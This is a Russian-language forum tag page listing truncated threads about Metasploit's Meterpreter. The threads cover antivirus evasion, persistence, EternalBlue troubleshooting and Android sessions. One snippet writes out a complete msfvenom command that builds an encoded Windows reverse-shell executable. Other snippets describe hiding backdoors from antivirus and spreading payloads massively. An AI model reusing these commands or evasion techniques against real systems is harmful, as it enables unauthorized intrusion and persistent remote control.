meterpreter

  1. SooLFaa

    Статья Обход антивируса с помощью Метасплоита

    Первоисточник: Bypassing Detection for a Reverse Meterpreter Shell – Checkmate Перевод: Перевод выполнен от команды Codeby Примечание от команды форума: Статья является переводом. Метерпретер - это очень мощный по функционалу и основной payload для Metasploit. В статье рассматривается способ...
  2. S

    Проблема Открытие и закрытие сесий Meterpreter

    Доброго времени суток, я новичек в плане метасплоита но все же пытаюсь взломать свой смартфон, и так почитал гайды по написанию эксплоита. Все сделал правильно запустил msfconsole далее последовали такие команды из мануал предоставленого на форуме use exploit/multi/handler set payload...
  3. P

    Решено Получить текст из другого линукс терминала.

    Всем привет. Заразил метерпретером пк, там точно запущен 1 терминал. Мне нужно прочитать текст из того терминала. Имеем: 2 бэкдора. Оба мои. 1 Просто реверс шелл, другой реверс метерпретер. 1 окно терминала. ID процесса нужного терминала. Система: debian У кого то есть идеи как это сделать...
  4. N

    Проблема Мониторинг вирусов, живущих в оперативной памяти

    Доброго времени суток! Подскажите пожалуйста, как обычному юзеру научиться выявлять трояны, которые находятся в оперативной памяти - ведь антивирусы для них зачастую не являются барьером. В интернете пишут что все же такие вирусы оставляют следы в реестре, дампах, а так же их можно вычислить по...
  5. G

    Проблема Автоматический персистенс/бэкдор для meterpreter-сессии

    Нужна помощь в организации автоматического персистенса/бэкдора Пока тестирую в локальной сети на Win7. Идея такая: пейлоад распространяется массово, атакующая машина Kali стоит на VDS и перманентно слушает порт через multi/handler. Как только прилетает meterpreter-сессия должен сработать...
  6. F

    Проблема activity start

    Всем привет, может ли кто нибудь помочь? В метерпретер для ведра есть команда activity_start Так вот хотелось бы знать как ею пользоваться, может есть какой нибудь список активити, или как получить его можно?
  7. lsdrfrx

    Проблема Шифрование бэкдоров

    Требуется спрятать бэкдор от антивирусов, чекал всевозможные статьи, ничего не выходит. Создаю через metasploit-framework, требуется спрятать windows/meterpreter/reverse_tcp. Кажется, что самому написать бэкдор, который не будет палиться антивирусом, проще, чем найти программу, которая спрячет...
  8. Rook

    Проблема Скачивание данных через Армитаж

    Всем привет,подключаюсь к ВМ ОС Вин7,через армитаж,eternalblue ms17 010 ,нагрузка meterpreter/reverse_tcp ,потом через меню пытаюсь открыть диск с данными,все открывает,показывает,при по пытке скачать,создаёт только папки с данными в папке загрузок,1 раз скачал файл размером 1кб desktop.ini и не...
  9. Rook

    Проблема Коннект метерпретер

    В сети есть удаленное устройство ( не в сети роутера,а в подсети города одного провайдера) через смб17_010 все уязвимо,но если подключатся из локальной сети роутера и выходить в мир,идёт fail и сбрасывается Коннект,а если включить кабель на прямую и ввести статику,то все удачно коннектится. В...
  10. gushmazuko

    Статья Meterpreter снова в деле: 100% FUD with Metasploit 5

    Введение Доброго времени суток друзья! Рад снова вас видеть! Написать эту статью я намеревался еще до официального релиза Metasploit 5, но вечно не хватающее время и некоторые другие обстоятельства не позволили этому сбыться. Сегодня речь пойдет как вы уже могли понять из заголовка - об обходе...
  11. g3r01n

    meterpreter and nat

    Всем привет, есть ли возможность провести аудит пк удаленно с помощью meterpreter? Пробовал через ngrok, не получилось, читал статью Vander'a и тоже нуль результатов. Может кто объяснить?
  12. K

    метерпретер конект

    Здравствуйте, в инете очень много способов создать фуд пейлоад (метасплоит) запустить его тоже не большая проблема, только вот допустим меня нету дома и метерпретер конектится, но не может подконектиться так как комп выключен, как я знаю сессия умрет через 15 минут да? Что мне сделать чтоб...
  13. recrut

    Debian 9 - install metasploit на vps ( для получения сессии при белом ip)

    Друзья, подскажите, думаю многим пригодится В инете что не сервер, то новая инструкция, + разные оболочки с настойками Посоветуйте, как не напороть косяков! Грамотно установить оболочку, не инсталируя лишнего, что б не вызвать конфликтов. И главное как им (сервером) управлять в графическом...
  14. E

    Проблема Meterpreter session 8 closed. Reason: Died

    Доброго время суток. Нуждаюсь в помощи людей который знакомы с metasploit.Проблема такая, я генерирую пейлоад ( msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=172.16.104.130 LPORT=443 -b "\x00" -e x64/shikata_ga_nai -f exe -o /tmp/1.exe ), закидаю файл на машину...
  15. R

    Проблема Eternalblue & Doublepulsar. Error getting output back from Core.

    В локалке имеется машинка Win7 SP1 x86 (192.168.1.106) И Kali linux (192.168.1.103) на которую установлен Metasploit-Framework с добавленным модулем exploit/windows/smb/eternalblue_doublepulsar. Сканирую виндовую машину с помощью auxiliary/scaner/smb/smb_ms17_010: Делаю вывод, что машинка...
  16. R

    Проблема EternalBlue. Did not receive a response from exploit packet.

    Помогите пожалуйста, почему возникает эта ошибка? Можно ли как-то от нее избавиться, и если можно, то как?
  17. kravl

    Как создать payload который будет работать в режиме persistence ?

    Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ? Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый...
  18. A

    Проблема Шелл в сесиии meterpreter

    Добрый день. Получил сессию meterpreter, и у меня сразу же открылся командный шелл (cmd). После этого не удается перейти на стандартный шелл meterpreter. Как быть? Есть еще вопрос: после того как получил сессию, и случайно закрыл терминал, то всё удалится. Можно ли как то сохранять сессию?
  19. Mitistofel

    Решено Как включить "netlogon" на "windows" машине, имея сессию "meterpreter"?

    Здрасте. Сталкивался кто с подобным? На целевой машине есть сессия "meterpreter" и создан пользователь с правами администратора. Когда пытаюсь подключиться к цели как к дедику, через "RDP". То подключаюсь до того момента, когда вижу строки для входа в машину "windows" с взятыми из "RDP" клиента...
  20. House26

    Решено Миграция процесса meterpreter в другой процесс Android

    Добрый день форумчане)Подскажите как можно мигрировать процесс meterpretor в другой процесс на Android?Или как можно закрепиться в системе?